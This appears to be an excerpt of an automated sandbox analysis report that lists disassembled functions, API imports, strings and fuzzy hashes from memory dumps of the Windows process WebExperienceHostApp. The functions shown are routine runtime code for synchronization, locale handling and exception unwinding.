Opcode ID: ace867cac6d922fdf45cf98f8f1924e58bc32f1dff1343da71478c459ec0add8
Instruction ID: b68b0c0c7b5c3eacec1d0929fb8853a4aa64359058d9f1fd0c278c886c40a8b6
Opcode Fuzzy Hash: ace867cac6d922fdf45cf98f8f1924e58bc32f1dff1343da71478c459ec0add8
Instruction Fuzzy Hash: CE818B62B0AA8585FB089B65E8543BC2771AB48B88F584532DF9D177AAEE3CD581C340

Function 00007FF619498520 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6194985F6
OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6194986E2
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6194987B8

Strings

_p0, xrefs: 00007FF6194985A9

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: OpenSemaphore$ErrorLast
String ID: _p0
API String ID: 3042991519-2437413317
Opcode ID: e1651974c0d4eb00dff02a0b90013a07eae932ebbb22d0f2ffa93ef9d7cfcb72
Instruction ID: 9fd68fed359e2e40c8d56eec91dfa7d3404e0d7767173c0650ad57c085ecef55
Opcode Fuzzy Hash: e1651974c0d4eb00dff02a0b90013a07eae932ebbb22d0f2ffa93ef9d7cfcb72
Instruction Fuzzy Hash: 0F719422B19E82D1EB51DF68D9601BA63A0FF88BA8F544431EA4D87755EF3CD925C700

Function 00007FFE007CCFB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFE007CD11C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007CD209

Strings

0123456789-, xrefs: 00007FFE007CD054
%.0Lf, xrefs: 00007FFE007CD04D

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpy
String ID: %.0Lf$0123456789-
API String ID: 931391446-3094241602
Opcode ID: e9d311e3a2d0453829feae00b2cc32a2770a8b394b8cd978c89192b67e3cf306
Instruction ID: 75df2417cad514a5d2f786b0b1ce9eb0f0342dc84b4c09be41563f47baec11c6
Opcode Fuzzy Hash: e9d311e3a2d0453829feae00b2cc32a2770a8b394b8cd978c89192b67e3cf306
Instruction Fuzzy Hash: 43715C62B0AB5599EB10DFA5D4506AC3371FB48B88F494036DF4D17BA9DE3CD89AC340

Function 00007FFE007D7850 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140_APP ref: 00007FFE007D7951
memcpy.VCRUNTIME140_APP ref: 00007FFE007D79B2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007D7A9C

Strings

0123456789-, xrefs: 00007FFE007D78F2

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemchrmemcpy
String ID: 0123456789-
API String ID: 4232306570-3850129594
Opcode ID: b66fa995d862786ad70c83aa3692fa7ff2d0f80ca9987ad818803cdf48cd1475
Instruction ID: 3b20e1fa32ff77bd3ac7826c7e803263c9b8d6a74cb4e0cc597184c38c385607
Opcode Fuzzy Hash: b66fa995d862786ad70c83aa3692fa7ff2d0f80ca9987ad818803cdf48cd1475
Instruction Fuzzy Hash: FE718C22B0EB8599EB05EBA5D4502AC7771EB45B88F484036DF8D27BADDE3CE556C300

Function 00007FFE007D7AD0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

swprintf_s.PGOCR ref: 00007FFE007D7B6A
memset.VCRUNTIME140_APP ref: 00007FFE007D7C22
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007D7D09

Part of subcall function 00007FFE007AB678: memset.VCRUNTIME140_APP(?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB71B

Strings

%.0Lf, xrefs: 00007FFE007D7B5A

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memset$_invalid_parameter_noinfo_noreturnswprintf_s
String ID: %.0Lf
API String ID: 1248405305-1402515088
Opcode ID: ec13666b7fd0f09e99187055b236b0abcd58ba996a916074fadd5549c94d382e
Instruction ID: 3543d949fd5306535e4f0a30dd48b9577f31c2be85c18d7963c3efe58e36529c
Opcode Fuzzy Hash: ec13666b7fd0f09e99187055b236b0abcd58ba996a916074fadd5549c94d382e
Instruction Fuzzy Hash: 3B618122B0AB8589EB01EB75E4502AD7771EB45B98F584136EF8D27B6DDE3CD046C340

Function 00007FFE1A454068 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4541E7

Strings

, xrefs: 00007FFE1A454138
csm, xrefs: 00007FFE1A454221
csm, xrefs: 00007FFE1A4540B7

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: 181858bddd0f771f635e266b645b507512d406852fa62591119b22970761e9c7
Instruction ID: 86a7267148dd640530ce94a6aaa84730da47d248d855a8788d18fa1b93947ea4
Opcode Fuzzy Hash: 181858bddd0f771f635e266b645b507512d406852fa62591119b22970761e9c7
Instruction Fuzzy Hash: FA71D9B6B08A9186D7249F16D4406BD7BA1EB04FE4F1481B7EA4C0BAAACF3CD571C700

Function 00007FFE1A453E40 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A456770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4523AE), ref: 00007FFE1A45677E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A453F37
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A453F47

Strings

csm, xrefs: 00007FFE1A453F99
csm, xrefs: 00007FFE1A453E8A

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: Frameabort$EmptyHandler3::StateUnwind
String ID: csm$csm
API String ID: 4108983575-3733052814
Opcode ID: 6cc9a4182677805c38e53337c324a2a6144c6831a4eccc363549fdf53aa87d8e
Instruction ID: dc09aa9681eb2a350302a37afc53dcfdb31b16a39ab05d288260c23ce8449f9e
Opcode Fuzzy Hash: 6cc9a4182677805c38e53337c324a2a6144c6831a4eccc363549fdf53aa87d8e
Instruction Fuzzy Hash: 425181B3B08A8286EB64AB17905427877A1EB54FA5F1441F7DA9D47BA6CF3CF460C700

Function 00007FFE1A45E970 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A45EA30
RtlUnwindEx.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0(?,?,?,?,?,?,?,00007FFE1A45E735), ref: 00007FFE1A45EA7F

Strings

f, xrefs: 00007FFE1A45E9AE
csm, xrefs: 00007FFE1A45EA16

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind
String ID: csm$f
API String ID: 451473138-629598281
Opcode ID: 596fc2b158a4246977d309a96ad6f7813b01e1ac3dbcf012ac6f28eb0dcb6cc7
Instruction ID: e66fd93ea5f0d5599a20d83585d31eba6c5e0ba9eefb1b5d49f0c639dbc63faf
Opcode Fuzzy Hash: 596fc2b158a4246977d309a96ad6f7813b01e1ac3dbcf012ac6f28eb0dcb6cc7
Instruction Fuzzy Hash: 1C51C3B2F09A4286EB24EB26E405A393795FB44FA5F50C1F2DA1A43758DF78E851C700

Function 00007FFE007A2560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A25A2
RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE007A26B8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007A26DD

Strings

csm, xrefs: 00007FFE007A2606

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Exception$RaiseThrowabort
String ID: csm
API String ID: 3758033050-1018135373
Opcode ID: dfa6e63e12c7d75b43cf8b279f64167cec423cec088571d2c799f5e25e408b82
Instruction ID: f542f112f8ce3df8ea77baaf535b4239e3bed301dd4a2c2b1efa73c9d43c4251
Opcode Fuzzy Hash: dfa6e63e12c7d75b43cf8b279f64167cec423cec088571d2c799f5e25e408b82
Instruction Fuzzy Hash: BB518132906F8986DB54DF28C4502B83360FB99B58F199325EB5D077AADF39E6D6C300

Function 00007FF619496AF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF619496B1F
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF619496B6B

Part of subcall function 00007FF619498A00: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF619498A3A

Strings

Local\SM0:%lu:%lu:%hs, xrefs: 00007FF619496B35
x, xrefs: 00007FF619496B2D

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: CreateCurrentErrorLastMutexProcess
String ID: Local\SM0:%lu:%lu:%hs$x
API String ID: 3298007088-452036900
Opcode ID: 0a12aa2f88bb20d10652bc4003f766e7430386beed50e6a6e1fb266b87b09c82
Instruction ID: d418939576f2545eb4345c308c1a0072dd00c77cc66ff6d4b16c604a80396551
Opcode Fuzzy Hash: 0a12aa2f88bb20d10652bc4003f766e7430386beed50e6a6e1fb266b87b09c82
Instruction Fuzzy Hash: EB41833261CE8291EB50DF25E5A01AE6360FB9CBA8F405035FA8EC3B96DE3CD565C740

Function 00007FFE007AFA00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007AF984
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007AF996
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007AFA1B

Part of subcall function 00007FFE007A4D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D32
Part of subcall function 00007FFE007A4D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D58
Part of subcall function 00007FFE007A4D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007B2134,?,?,?,00007FFE007A439B,?,?,?,00007FFE007A5AE1), ref: 00007FFE007A4D70

Strings

bad locale name, xrefs: 00007FFE007AF9E5

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: setlocale$freemallocmemcpy
String ID: bad locale name
API String ID: 1663771476-1405518554
Opcode ID: d094a8940004dce9378923e4909419ca7b3449e962a542eb783f077e1d48bd15
Instruction ID: 4081fdfd1adff534083bec6e6b39add135b6c675fd789bfc485a57f954bf7d83
Opcode Fuzzy Hash: d094a8940004dce9378923e4909419ca7b3449e962a542eb783f077e1d48bd15
Instruction Fuzzy Hash: E931AC62F0E68251FB55AB55D44427A6251AFC6BC0F5C8036EB4D977BDDE3CF4818700

Function 00007FFE007C43B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFE007BA86C), ref: 00007FFE007C43F1

Part of subcall function 00007FFE007AB610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007D1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007AB63B
Part of subcall function 00007FFE007AB610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE007D1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007AB657

Part of subcall function 00007FFE007B6EBC: _Maklocstr.LIBCPMT ref: 00007FFE007B6EEC
Part of subcall function 00007FFE007B6EBC: _Maklocstr.LIBCPMT ref: 00007FFE007B6F0B
Part of subcall function 00007FFE007B6EBC: _Maklocstr.LIBCPMT ref: 00007FFE007B6F2A

Strings

$+xv, xrefs: 00007FFE007C445F
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FFE007C4466
$+xv, xrefs: 00007FFE007C44D6

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstr$___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 2904694926-3573081731
Opcode ID: e76dbe75405fbdaedae8952bdfdeb617f0b0a78e7a50d76c276933190faa78df
Instruction ID: 2a38212340dab3d81b4e572a82e5a3d1499b2840cebcd0594e0c1a7741b4d7e5
Opcode Fuzzy Hash: e76dbe75405fbdaedae8952bdfdeb617f0b0a78e7a50d76c276933190faa78df
Instruction Fuzzy Hash: EB41D132A09B8187E768DF25D590A6D7BA0FB45781B184239DB8943F29DF3CF661C700

Function 00007FFE007D4E34 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,?,00000001,00007FFE007D2CE8), ref: 00007FFE007D4E75

Part of subcall function 00007FFE007AB610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007D1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007AB63B
Part of subcall function 00007FFE007AB610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE007D1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007AB657

Strings

$+xv, xrefs: 00007FFE007D4F5A
$+xv, xrefs: 00007FFE007D4EE3
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FFE007D4EEA

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 3376215315-3573081731
Opcode ID: e747cb05a516fb7cb06c3540bad08c0af1c8a589c04e394ce18014a6d7ffc13d
Instruction ID: 9070153faa5b2d1b1115995da0e416eba73a46609a317816ede1f0b0a2454b11
Opcode Fuzzy Hash: e747cb05a516fb7cb06c3540bad08c0af1c8a589c04e394ce18014a6d7ffc13d
Instruction Fuzzy Hash: 61419B32A09B819BEB24DF21E59056D7BB0FB54781B084236DB8D93F29DB3CE561CB00

Function 00007FFE1A45A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A45A494

Strings

%lf, xrefs: 00007FFE1A45A4DA

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: 3f49dcae742c8bfa69eabadb2c79b2d4ceee00cf0999bfe9215d1b8c6cd360a0
Instruction ID: 6a9095a5491c4d3d7855324d05d821f6ef90e51f3996b652d4200697bf5c270b
Opcode Fuzzy Hash: 3f49dcae742c8bfa69eabadb2c79b2d4ceee00cf0999bfe9215d1b8c6cd360a0
Instruction Fuzzy Hash: 8231C1B2B0CF8585EA20EB22A8542797764FB89F94F9481F2E99E47265CF3CD4258740

Function 00007FFE007A43B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE007A671C: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007A67CF

__std_exception_copy.VCRUNTIME140_APP ref: 00007FFE007A443B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007A447C

Strings

pVz, xrefs: 00007FFE007A4444
Vz, xrefs: 00007FFE007A448B

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: Vz$pVz
API String ID: 1944019136-485803951
Opcode ID: a893699d33faabf76b3b2f70d19aca2e2e10cc9c0b266e1a7bdf617b24cf58dd
Instruction ID: bf56979d455475a0c6d9ee2ea9b53cfab3a23a0e5f36dd810c031a85e061ecc7
Opcode Fuzzy Hash: a893699d33faabf76b3b2f70d19aca2e2e10cc9c0b266e1a7bdf617b24cf58dd
Instruction Fuzzy Hash: C2316B62E15B9688FB009BA4E8443BC2375BB99758F444231DF5C6B7A9EF7CA194C340

Function 00007FF619495108 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,00000000,?,?,00007FF6194931E9,?,?,?,?,?,?,?,?), ref: 00007FF61949514F
GetErrorInfo.OLEAUT32(?,?,?,?,00000000,?), ref: 00007FF619495182

Strings

combase.dll, xrefs: 00007FF619495139
RoOriginateLanguageException, xrefs: 00007FF619495148

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

